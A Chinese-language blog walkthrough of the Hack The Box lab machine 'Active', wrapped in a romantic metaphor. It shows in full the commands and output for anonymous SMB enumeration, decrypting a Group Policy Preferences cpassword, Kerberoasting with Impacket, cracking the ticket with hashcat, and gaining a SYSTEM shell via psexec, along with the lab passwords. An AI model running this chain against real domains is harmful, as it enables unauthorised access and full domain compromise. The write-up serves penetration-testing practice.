title: Hack The Box - Active(共享中的敏感信息) author: World'sEnd layout: true categories: 内网安全 tags:
打靶日记
Wouldn't life be miserable if you couldn't find one thing that you could do your best? 如果找不到一件能让你倾尽全力的事,那一辈子不是会很煎熬?
Hack The Box - Active:
我想,如果有一个企业的Active Directory 环境,我没有PowerView,没有Bloodhound,我该如何进行域侦测,开源情报?或者游走在目标附近带个窃听器?我可以用windows命令,如果命令被像linux一样做了严格的权限策略限制呢?
玩了几年电脑,装过无数软件,也优化过无数次设置,还重装过好几次windows系统,从心里总是对windows的使用嗤之以鼻,对windows 的机制不屑一顾。现在,如若我真处在那样一个Active Directory环境,不由的从心底升起一种无力感,越想越对windows产生一种畏惧。
$ sudo nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 15:56 CST
Stats: 0:10:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 81.52% done; ETC: 16:09 (0:02:22 remaining)
Stats: 0:13:52 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 21.74% done; ETC: 16:10 (0:00:32 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.52s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-22 08:10:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-22T08:11:27
|_ start_date: 2022-04-22T06:55:19
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 907.96 seconds
当想了解一个人时,最开始总是会更多的关注一些细节,判断她的性格,她的优点,她的缺陷,并会在自己内心勾勒出她的人物画像,便靠着第六感开始猜想,以目前的关系,她会分享给我什么,就好比53端口,初次见面,她不知我,我也无别人迁桥搭线,两人就这么偶然见面,她也只当我为匆匆路人,我便开始主动找话题:
$ dig axfr @10.10.10.100 active.htb
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.100 active.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
或许是我过于直接,她并不是很想理我,但我并不想轻易放弃,我瞧着她内心欢喜,便换了另一个话题:
$ rpcclient -U "" 10.10.10.100 -N
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
她莫名其妙的看着我,我稚嫩的搭讪手段似乎被她轻易看穿,或许她看出我内心没有坏心思,我还是找到了一些话题可以聊聊,她似乎也觉得这场缘分有些许奇妙,便回应了我:
$ smbclient -N -L //10.10.10.100
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
初次见面,有些方面还是不愿与人交流,我也不便多问:
$ smbclient //10.10.10.100/NETLOGON
Enter WORKGROUP\worldisend's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
但她似乎也对我有些好感,有些事情,如若我问,她还是会告我些许:
$ smbclient //10.10.10.100/Replication
Enter WORKGROUP\worldisend's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
active.htb D 0 Sat Jul 21 18:37:44 2018
5217023 blocks of size 4096. 278794 blocks available
交谈许久,关系升温,从最初的路人,到偶遇的友人,她与我讲的,也就越来越多:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018
5217023 blocks of size 4096. 278794 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>
不经意之间,我从她的谈吐字间发现了一些小秘密:
$ cat Groups.xml
"1.0" encoding="utf-8"?>
"{3125E937-EB16-4b4c-9934-544FC6D24D26}">"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">"U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
active.htb\SVC_TGS
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
我提起了这个秘密,但她似乎有些害羞,不愿直白的告诉我这秘密的意义,但我感知敏锐,还是能从关键字中看出些什么:
cpassword 在 SYSVOL 中查找密码并利用组策略首选项
由于篇幅过多,我不便引用:
https://adsecurity.org/?p=2288
每当创建新的组策略首选项 (GPP) 时,都会在 SYSVOL 共享中创建一个带有该配置数据的 xml 文件,包括与 GPP 关联的任何密码。为安全起见,Microsof在将密码AES加密存储为cpassword、. 但随后微软在 MSDN 上公布了密钥。kali自带一款gpp-decrypt,能帮我更好的解读:
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
她见我已经知晓了她的秘密,虽依旧有些脸红,但大大咧咧的不是很在意了,我们之间渐渐的是熟络起来,就像话匣子开了一样,她愿意与我说更多的话:
$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 22:39:20 2018
.. DR 0 Sat Jul 21 22:39:20 2018
Administrator D 0 Mon Jul 16 18:14:21 2018
All Users DHSrn 0 Tue Jul 14 13:06:44 2009
Default DHR 0 Tue Jul 14 14:38:21 2009
Default User DHSrn 0 Tue Jul 14 13:06:44 2009
desktop.ini AHS 174 Tue Jul 14 12:57:55 2009
Public DR 0 Tue Jul 14 12:57:55 2009
SVC_TGS D 0 Sat Jul 21 23:16:32 2018
5217023 blocks of size 4096. 278744 blocks available
smb: \>
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 23:14:42 2018
.. D 0 Sat Jul 21 23:14:42 2018
user.txt AR 34 Fri Apr 22 14:56:25 2022
5217023 blocks of size 4096. 278744 blocks available
smb: \SVC_TGS\Desktop\> type user.txt
type: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
之前有一些她不愿意的,现在也愿意说与我听:
$ rpcclient -U "SVC_TGS" 10.10.10.100
Enter WORKGROUP\SVC_TGS's password: GPPstillStandingStrong2k18
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
rpcclient $>
或许这时我应该直白主动一点,或许她这次会给我机会呢:
$ ./GetNPUsers.py -no-pass -dc-ip 10.10.10.100 htb/Administrator | grep -v Impacket
[*] Getting TGT for Administrator
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
怪我操之过急,我们之间的关系开始微妙起来,我内心也很是慌张,为了缓解尴尬的气氛,我将话题注意力转到了其他地方,请求她跟我讲讲其他的事情,她似乎读懂了我的心思:
$ ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2022-04-22 14:56:29.468554
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fc7fce3df63153ef800f6ca44fddc932$91b8286f18fe30a0d26d701914caf2b91659aac5abcfef428a4de67d54782440672295b2bb1a4797f17be9aaccfd35c2b267a5501e72da4c4a0c84f067eb6d87a1f09632ca49352fb1d52db5def620c33e0916327b5710c7d03b7aebcc7b7b7364ac75acfd2b11fd36eec1cbacae862643b0dd1cddde685ae2f244fb3631e9eec17615148c5f088c44d5c0aba4c6624ac6840a8971f2103974dc8bbb2ea46005d209f681a2bc3eb9daed0bb7de509f109024d08b880423e3f9b79ae4e05eeafa4d223fa7ca1a9399c8974fddc652721454b0aad94eaa5f0c5ac23dc2f3729b4ea694e27b3b5b2c7fcc7cc07aaeb872dfb9acb236d086fc7065091e4bb306b692246556c96cab949d7ed6cfac6ab780760930502f392d7ffb9fabe8884c798102f707a62cdf07bf35628a7a634d60d66467e9b6b7e98965ee3223b2067ceb73d488bcb678dae8bfbeef836cb65181c1f6954f09ba21cff29a7a667732ceae05c7b93b4284babcf98441c66e97c30d9a598ad7c0535ce538e4d486ae34cfb1f90e9eadf6a634c281b25a00fc755cf28645961665d185adfefdf82914d5ec3aa248234d3b8dbe144e6cb01edc2876ee665941aa423ce8ec602a9b1650484b16dcd4d91fde33980c44ce0e645f9c98cac792f073e554c4c1176d1572f6f9d21cc45a68caf5649b07dce48f428f5581b05aaa5e56c216bd96dfe91967d36edd3f6547186993f8cf3a52b035d240ade98b06ba68d3dc6da3eaa5a3bd08465a7e845d67a793c16457793f49a29595cec3b77cf3c270a4a92a7c92ccf0b0fe7f1eb5d4e9ab4158c0c7d7f2d13da921fb3f3c88675de0eba481f651f4f7227eaf8ea11f12f01e1b4a873d365de7dceb029c0a9c51b433053aa96c9320410dec72b8503ebf5df108017040a9fea76e6d4019808d21c5da6230c20a3b5f56aee4a325dfca27dfae858d290c99349a2a64599fa4b4012a22b721f9ef560366ec7f265fe726f0672d21f5fead3fe5133a3cef195998c1c2cf17d202e3d93cb2be2790ebb48b9ce41debfae7dedd3e99a23cbd89bdb54f642456d362bd5ce0d7aebb75ce1e573d1211946a5b010531bb220bc5514edd6a0491b841591369ca368881391de7ac592c02c3278e6586a7f805ab37242a6e9ac8012bb4ae2590725f7848e78bc9e62df09ce509191df5a2f3b319b508d76ef822a75011747d541b3843dfd30b68e18afbbe0380178f874c85a5a460ec1bf7c459a24a66d46bd9e2bca9
而我也在细细品味她的神情举止,想了解她更多,而我也在心里不断的盘算着如何更进一步:
$ hashcat -h | grep "TGS"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
$ hashcat -m 19600 ./user.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
Hashfile './user.txt' on line 1 ($krb5t...a460ec1bf7c459a24a66d46bd9e2bca9): Separator unmatched
No hashes loaded.
$ hashcat -m 19700 ./user.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
Hashfile './user.txt' on line 1 ($krb5t...a460ec1bf7c459a24a66d46bd9e2bca9): Separator unmatched
No hashes loaded.
$ hashcat -m 13100 ./user.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fc7fce3df63153ef800f6ca44fddc932$91b8286f18fe30a0d26d701914caf2b91659aac5abcfef428a4de67d54782440672295b2bb1a4797f17be9aaccfd35c2b267a5501e72da4c4a0c84f067eb6d87a1f09632ca49352fb1d52db5def620c33e0916327b5710c7d03b7aebcc7b7b7364ac75acfd2b11fd36eec1cbacae862643b0dd1cddde685ae2f244fb3631e9eec17615148c5f088c44d5c0aba4c6624ac6840a8971f2103974dc8bbb2ea46005d209f681a2bc3eb9daed0bb7de509f109024d08b880423e3f9b79ae4e05eeafa4d223fa7ca1a9399c8974fddc652721454b0aad94eaa5f0c5ac23dc2f3729b4ea694e27b3b5b2c7fcc7cc07aaeb872dfb9acb236d086fc7065091e4bb306b692246556c96cab949d7ed6cfac6ab780760930502f392d7ffb9fabe8884c798102f707a62cdf07bf35628a7a634d60d66467e9b6b7e98965ee3223b2067ceb73d488bcb678dae8bfbeef836cb65181c1f6954f09ba21cff29a7a667732ceae05c7b93b4284babcf98441c66e97c30d9a598ad7c0535ce538e4d486ae34cfb1f90e9eadf6a634c281b25a00fc755cf28645961665d185adfefdf82914d5ec3aa248234d3b8dbe144e6cb01edc2876ee665941aa423ce8ec602a9b1650484b16dcd4d91fde33980c44ce0e645f9c98cac792f073e554c4c1176d1572f6f9d21cc45a68caf5649b07dce48f428f5581b05aaa5e56c216bd96dfe91967d36edd3f6547186993f8cf3a52b035d240ade98b06ba68d3dc6da3eaa5a3bd08465a7e845d67a793c16457793f49a29595cec3b77cf3c270a4a92a7c92ccf0b0fe7f1eb5d4e9ab4158c0c7d7f2d13da921fb3f3c88675de0eba481f651f4f7227eaf8ea11f12f01e1b4a873d365de7dceb029c0a9c51b433053aa96c9320410dec72b8503ebf5df108017040a9fea76e6d4019808d21c5da6230c20a3b5f56aee4a325dfca27dfae858d290c99349a2a64599fa4b4012a22b721f9ef560366ec7f265fe726f0672d21f5fead3fe5133a3cef195998c1c2cf17d202e3d93cb2be2790ebb48b9ce41debfae7dedd3e99a23cbd89bdb54f642456d362bd5ce0d7aebb75ce1e573d1211946a5b010531bb220bc5514edd6a0491b841591369ca368881391de7ac592c02c3278e6586a7f805ab37242a6e9ac8012bb4ae2590725f7848e78bc9e62df09ce509191df5a2f3b319b508d76ef822a75011747d541b3843dfd30b68e18afbbe0380178f874c85a5a460ec1bf7c459a24a66d46bd9e2bca9:Ticketmaster1968
我注意到了Ticketmaster1968,或许我可以再以此为话题请求她讲更多给我听:
$ smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 10:34:39 2009
Documents and Settings DHSrn 0 Tue Jul 14 13:06:44 2009
pagefile.sys AHS 5041647616 Fri Apr 22 14:55:08 2022
PerfLogs D 0 Tue Jul 14 11:20:08 2009
Program Files DR 0 Wed Jan 12 21:11:58 2022
Program Files (x86) DR 0 Fri Jan 22 00:49:16 2021
ProgramData DHn 0 Wed Jan 12 21:09:27 2022
Recovery DHSn 0 Mon Jul 16 18:13:22 2018
System Volume Information DHS 0 Thu Jul 19 02:45:01 2018
Users DR 0 Sat Jul 21 22:39:20 2018
Windows D 0 Fri Apr 22 16:18:07 2022
5217023 blocks of size 4096. 278344 blocks available
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
. DR 0 Fri Jan 22 00:49:47 2021
.. DR 0 Fri Jan 22 00:49:47 2021
desktop.ini AHS 282 Mon Jul 30 21:50:10 2018
root.txt AR 34 Fri Apr 22 14:56:25 2022
5217023 blocks of size 4096. 278344 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
或许我们之间的关系可以更进一步:
$ ./psexec.py active.htb/administrator@10.10.10.100
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file VFGFDkbk.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service oDIN on 10.10.10.100.....
[*] Starting service oDIN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
人总是喜欢折中的,如若我甘愿当朋友,我自然是不愿意的,但若一脚迈出关系破裂,我又会觉得交个朋友也不错。我不甘心命中注定,但我又相信命中注定,如若强求,不如顺其自然的好。